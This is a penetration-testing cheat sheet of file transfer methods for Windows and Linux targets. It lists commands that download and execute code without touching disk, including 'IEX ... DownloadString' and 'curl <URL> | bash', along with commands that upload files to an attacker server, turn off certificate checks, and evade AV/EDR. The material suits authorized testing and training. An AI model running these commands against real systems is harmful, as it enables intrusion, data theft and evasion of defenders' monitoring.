File Transfer Techniques for Pentesting
Overview
File transfer techniques are critical for penetration testing, especially in restricted environments. This guide covers both Windows and Linux methods, with practical commands and methodologies.
Common Challenges
Host-based Controls
Application whitelisting
AV/EDR blocking
Process monitoring
Network Controls
Firewall restrictions
IDS/IPS monitoring
Port filtering
Windows Transfer Techniques
PowerShell Methods
Base64 Transfer (No Network Required)
# On Attacker (Linux)
cat file | base64 -w 0
# On Target (Windows)
[IO.File]::WriteAllBytes("C:\path\to\file", [Convert]::FromBase64String("<base64_string>"))
# Verify Transfer
Get-FileHash C:\path\to\file -Algorithm MD5
Web Downloads
# Method 1: WebClient
(New-Object Net.WebClient).DownloadFile('<URL>', 'C:\path\to\outputfile')
# Method 2: Fileless Execution
IEX (New-Object Net.WebClient).DownloadString('<URL>')
# Method 3: Invoke-WebRequest
Invoke-WebRequest <URL> -UseBasicParsing -OutFile <outputfile>
SMB Transfer
# On Attacker: Start SMB Server
sudo impacket-smbserver share /tmp/smbshare -smb2support
# On Target: Copy File
copy \\<Attacker_IP>\share\file.exe
# Authenticated SMB
sudo impacket-smbserver share /tmp/smbshare -smb2support -user test -password test
net use Z: \\<Attacker_IP>\share /user:test test
FTP Transfer
# On Attacker: Start FTP Server
sudo python3 -m pyftpdlib --port 21 --write
# On Target: Download
(New-Object Net.WebClient).DownloadFile('ftp://<IP>/file.txt', 'C:\path\to\outputfile')
# On Target: Upload
(New-Object Net.WebClient).UploadFile('ftp://<IP>/file', 'C:\path\to\file')
Living Off The Land (LOtL) Binaries
WMIC
Bitsadmin
Certutil
Regsvr32
Linux Transfer Techniques
Base64 Transfer
# Encode
cat file | base64 -w 0; echo
# Decode
echo -n '<base64_string>' | base64 -d > file
# Verify
md5sum file
Web Transfer Methods
Download
# Wget
wget <URL> -O /path/to/file
# cURL
curl -o /path/to/file <URL>
# Fileless Execution
curl <URL> | bash
wget -qO- <URL> | python3
Upload
# cURL POST
curl -X POST https://<IP>/upload -F 'files=@/path/to/file' --insecure
# Start Python Upload Server
sudo python3 -m pip install uploadserver
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
SSH/SCP Transfer
# Start SSH Service
sudo systemctl enable ssh
sudo systemctl start ssh
# Download
scp username@<IP>:/remote/file /local/directory
# Upload
scp /local/file username@<IP>:/remote/directory
Simple Web Server
# Python3
python3 -m http.server
# PHP
php -S 0.0.0.0:8000
Common Issues & Solutions
SSL/TLS Issues (Windows)
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
Port Considerations
HTTP/HTTPS (80/443) - Usually allowed
SMB (445) - Often blocked
FTP (20/21) - May be filtered
SSH/SCP (22) - May require configuration
Security Best Practices
Transfer Verification
Always verify file integrity (MD5/SHA)
Check file permissions after transfer
Operational Security
Clean up temporary files
Remove credentials after use
Monitor for security alerts
Use encryption when possible
Fileless Operations
Prefer memory-only operations
Clean up artifacts
Be aware of logging/monitoring
Network Security
Use HTTPS/FTPS when available
Consider file size limitations
Monitor for AV/EDR alerts